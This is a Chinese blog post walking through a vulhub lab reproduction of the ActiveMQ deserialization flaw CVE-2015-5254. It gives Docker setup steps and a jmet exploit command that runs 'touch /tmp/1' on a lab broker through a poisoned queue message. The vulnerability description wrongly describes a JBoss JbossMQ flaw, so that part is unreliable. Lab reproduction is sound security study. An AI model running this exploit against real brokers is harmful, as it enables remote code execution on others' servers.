ActiveMQ 反序列化漏洞(CVE-2015-5254)

最新推荐文章于 2023-06-07 14:42:57 发布
最新推荐文章于 2023-06-07 14:42:57 发布
阅读量216 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/114852943
版权
漏洞编号

CVE-2015-5254

漏洞描述

Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

漏洞影响

Apache ActiveMQ 5.x ~ 5.13.0

漏洞利用

1.vulhub使用docker启动
cd /vulhub-master/activemq/CVE-2015-5254
docker-compose build
docker-compose up -d
2.环境搭建完毕访问8161web管理端口
业务端口:61616
用于生产消费数据
管理端口:8161
用于web端进行配置管理
在这里插入图片描述

3.kali中执行以下命令
wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
mkdir external
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “touch /tmp/1” -Yp ROME 192.168.239.129 61616
在这里插入图片描述

4.此时会给目标ActiveMQ添加一个名为event的队列
我们可以通过下面的URL看到这个队列中所有消息
http://192.168.13.132:8161/admin/browse.jsp?JMSDestination=event
在这里插入图片描述

5.点击此条队列详细进行触发
在这里插入图片描述

6.查看容器sudo docker-compose exec activemq bash,可见/tmp/1已成功创建,说明漏洞利用成功
在这里插入图片描述

7.关闭镜像
docker-compose down

加固建议

Apache升级activemq5.13.0

晚风不及你ღ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ActiveMQ 序列漏洞CVE-2015-5254)利用工具
08-15
ActiveMQ 序列漏洞CVE-2015-5254)利用工具,ActiveMQ漏洞序列漏洞CVE-2015-5254,利用工具,工具
ActiveMQ序列漏洞CVE-2015-5254) 漏洞利用工具
11-25
ActiveMQ序列漏洞CVE-2015-5254)漏洞利用工具,说明文档已存在请进行查看
【CVE】CVE-2015-5254:ActiveMQ 序列漏洞利用
边扯边淡
03-15 1815
起序:复现不难,就是需要好好的准备好靶场环境。 一、靶场环境 使用的是 github 上的 vulhub 环境。ActiveMQ 版本为 5.11.1。 vulhub:https://github.com/vulhub/vulhub 1、漏洞序列漏洞漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 2、影响版本 ActiveMQ < 5.13.0 之前 5.x 版本。 .
【vulhub漏洞复现】CVE-2015-5254 ActiveMQ序列漏洞
RexHa的博客
02-26 1788
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
ActiveMQ 序列漏洞CVE-2015-5254)
The code way of kinnisoy
10-24 1952
ActiveMQ 序列漏洞CVE-2015-5254)
ActiveMQ序列漏洞原理+复现
ChenD的学习笔记
03-09 2048
ActiveMQ通过消息队列来实现信息传递,每个消息要保证发出端和接收端格式相同,其中使用了序列的方法进行传递,在这个过程中没有限制可在代理中序列的类,这时候我们就可以自己构造一份序列的恶意代码payload,将其作为事件发到ActiveMQ服务上,在管理员在后台管理时触发了payload,或者攻击者使用弱口令拿到ActiveMQ的账户,并执行了payload,则可以成功利用该漏洞。消息队列,服务器A将客户发起的请求放入服务器B的消息队列中,服务器B从消息队列中取出并处理。
activemq-cpp-library-3.9.5 编译的windows库文件,支持vs2015、vs2017
07-21
activemq-cpp-library-3.9.5编译的C++库文件,支持vs2015,vs2017,包括了依赖的库文件和头文件,可以在项目中直接使用。
apache-activemq-5.16.5-bin.tar.gz 下载(5积分)
08-17
Apache ActiveMQ是Apache软件基金会的一个开源项目,是一个基于消息的通信中间件。ActiveMQ是JMS的一个具体实现,支持JMS的两种消息模型。ActiveMQ使用AMQP协议集成多平台应用,使用STOMP协议通过websockets在Web...
activemq-artemis-dynatrace-plugin:ActiveMQ Artemis经纪人流程的自定义Dynatrace JMX插件
05-03
Dynatrace的ActiveMQ Artemis插件关于经纪人流程的自定义 插件。Artemis概述插件该插件提供常规的代理统计信息,例如地址内存使用率,连接/用户数,总消息数,总消息添加/确认率。 Artemis Queues插件这提供了详细的...
ActiveMQ序列漏洞CVE-2015-5254复现
Cwillchris的博客
03-31 7731
准备两个linux虚拟机,一个为目标机(,以下简称A,ip:192.168.98.30),一个为攻击机(以下简称B,ip:192.168.98.70) 先搭建靶场,打开A,教程在这里vulhub靶场搭建及漏洞复现教程_Cwillchris的博客-CSDN博客 服务器A的生产端口(即用户可访问端口)为61616,管理端端口(后台)为8161 打开A 1、进入该漏洞环境所在目录 cd /root/desktop/vulhub/activemq/CVE-2015-5254 2、启动docker
ActiveMQ 序列漏洞 (CVE-2015-5254)
swordheart的博客
01-18 705
漏洞简介 Apache ActiveMQ 是由美国 Pachitea(Apache)软件基金会开发的开源消息中间件,支持 Java 消息服务、集群、Spring 框架等。 Apache ActiveMQ 5.x版本之前的5.13.0安全漏洞,该程序造成的漏洞不限制代理中可以序列的类。远程攻击者可以制作一个特殊的序列Java Message Service (JMS) ObjectMessage 对象,利用该漏洞执行任意代码。 漏洞环境 Docker -compose up -d 运行环
01 - vulhub - ActiveMq - CVE-2015-5254
利他者利己,利己者无功。利他利己,利己利他。
09-18 607
漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行恶意的代码。
【vulhub漏洞复现】ActiveMQ 序列漏洞 (CVE-2015-5254)-01
书山上的云的博客
01-10 2545
一、漏洞描述 Apache ActiveMQ 是由美国阿帕奇(Apache)软件基金会开发的开源消息中间件,支持 Java 消息服务、集群、Spring 框架等。属于消息队列组件(消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等)。 二、漏洞成因 Apache ActiveMQ 5.13.0版本之前到5.x版本的安全漏洞,该程序引起的漏洞不限制代理中可以序列的类。远程攻击者可以制作一个特殊的序列 Java 消息服务 (JMS) ObjectMessage 对象,利用该漏洞执行
activemq系列漏洞复现
m0_49420271的博客
06-07 2722
vulhub中activemq系列漏洞复现
ActiveMQ序列漏洞 getshell(CVE-2015-5254)——漏洞复现
W小哥
11-10 3669
一、ActiveMQ介绍 1.1 简介 Apache的一款JAVA开源消息中间件,支持Java消息服务、集群、SpringFrameword等。属于消息队列组件。 (消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等) 1.2 漏洞影响版本 Apache ActiveMQ < 5.13.0 之前 5.x版本 1.3 漏洞成因 漏洞没有限制在代理中序列的类,远程攻击者可以借助特制的序列的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 1.
ActiveMQ序列漏洞CVE-2015-5254)
Kevin's Blog
06-02 1760
文章目录一、介绍1.1 简介1.2 影响版本1.3 漏洞成因1.4 利用限制1.4 业务场景1.5 使用概率二、模拟环境三、漏洞利用3.1 信息收集3.2 漏洞复现 一、介绍 1.1 简介   Apache的一款JAVA开源消息中间件,支持Java消息服务、集群、SpringFrameword等。属于消息队列组件。 消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等 1.2 影响版本 Apache ActiveMQ < 5.x 1.3 漏洞成因   漏洞没有限制在代理
ActiveMQ 序列漏洞复现(CVE-2015-5254)
oiadkt的博客
04-14 493
ActiveMQ 序列漏洞复现(CVE-2015-5254)
ActiveMQ 序列漏洞
最新发布
08-19
ActiveMQ 序列漏洞是指在使用 ActiveMQ 进行消息传递时,由于未正确验证和过滤用户提交的数据,恶意攻击者可以利用该漏洞在目标系统上执行任意代码。这种漏洞通常是由于未正确配置 ActiveMQ序列序列...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值